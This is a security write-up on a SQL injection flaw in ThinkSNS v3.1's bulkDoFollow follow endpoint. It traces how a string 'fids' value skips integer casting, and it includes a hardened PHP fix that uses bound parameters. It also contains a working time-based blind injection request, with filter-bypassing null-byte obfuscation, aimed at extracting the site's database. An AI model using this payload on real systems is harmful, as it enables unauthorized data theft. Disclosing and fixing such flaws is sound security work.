Thinksns Defense Bypass Idea (Union select true Unrestricted SQL injection)
    public function bulkDoFollow() {
        // Safe filtering
        $res = $this->_follow_model->bulkDoFollow($this->mid, t($_POST['fids']));
        $this->ajaxReturn($res, $this->_follow_model->getError(), false !== $res);
    }
Follow into the follow model's bulkDoFollow():

    public function bulkDoFollow($uid, $fids) {
        $follow_states = $this->getFollowStateByFids($uid, $fids);
Follow into getFollowStateByFids():

    public function getFollowStateByFids($uid, $fids) {
        array_map('intval', $fids);
        $_fids = is_array($fids) ? implode(',', $fids) : $fids;
        if (empty($_fids)) {
            return array();
        }
        $follow_data = $this->where("uid = '{$uid}' AND fid IN ({$_fids}) OR (uid IN ({$_fids}) AND fid = '{$uid}')")->findAll();
        $follow_states = $this->_formatFollowState($uid, $fids, $follow_data);
Look at the logic:

    array_map('intval', $fids);
    $_fids = is_array($fids) ? implode(',', $fids) : $fids;

If fids arrives as a string, array_map('intval', "the") only emits a warning (array_map expects an array) and execution continues. The string is then used as $_fids unchanged and interpolated straight into the IN (...) clause, which is what causes the SQL injection.
Request URL:
http://localhost/thinksns_v3.1_20131108_28822/index.php?app=public&mod=follow&act=bulkdofollow
POST data:
fids=1,2,if(ASCII (substr((sele%00ct User () Fr%00om ts_atme limit 0,1), slee%00p (3), 1)) =114,5,1)))#
As a result, data across the whole site can be extracted by blind guessing.
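A hardened version of the id handling, added here as an example and not ThinkSNS's own code: it keeps the return value of array_map('intval', ...) (the original discards it), splits a string parameter into items before casting so the string path can no longer skip the cast, and hands the ids to the query as bound parameters instead of interpolating them. The helper names, the PHP 7.4+ syntax and the placeholder-style query (for use with a prepared statement rather than the framework's where() string) are assumptions.

```php
<?php
// Added example, not ThinkSNS code. Returns a list of positive ints no
// matter whether the request parameter arrives as an array, a
// comma-separated string, a scalar, or null.
function normalizeFids($fids): array
{
    if (!is_array($fids)) {
        // The original code let a string through untouched; split it
        // into items first so every item goes through intval().
        $fids = explode(',', (string) $fids);
    }
    $ints = array_map('intval', $fids);               // result is kept
    $ints = array_filter($ints, fn ($v) => $v > 0);    // drop 0/negatives
    return array_values(array_unique($ints));
}

// Builds the WHERE fragment with one placeholder per id, so the id list
// never reaches the SQL text as raw request input. $uid is assumed to
// be the integer session user id, as $this->mid is in the controller.
// Returns [sql, params]; an empty id list yields an empty query, which
// mirrors the original early return of array().
function buildFollowStateQuery(int $uid, array $ids): array
{
    if (empty($ids)) {
        return ['', []];
    }
    $in = implode(',', array_fill(0, count($ids), '?'));
    $sql = "uid = ? AND fid IN ($in) OR (uid IN ($in) AND fid = ?)";
    $params = array_merge([$uid], $ids, $ids, [$uid]);
    return [$sql, $params];
}

// Constructed inputs: the array form the UI normally sends, and a
// string form containing non-numeric junk, which is now reduced to
// its numeric items instead of reaching the query as text.
var_dump(normalizeFids(['1', '2', '3x']));
var_dump(normalizeFids('1,2,if(abc)'));
[$sql, $params] = buildFollowStateQuery(7, normalizeFids('1,2,if(abc)'));
echo $sql, "\n";
var_dump($params);
```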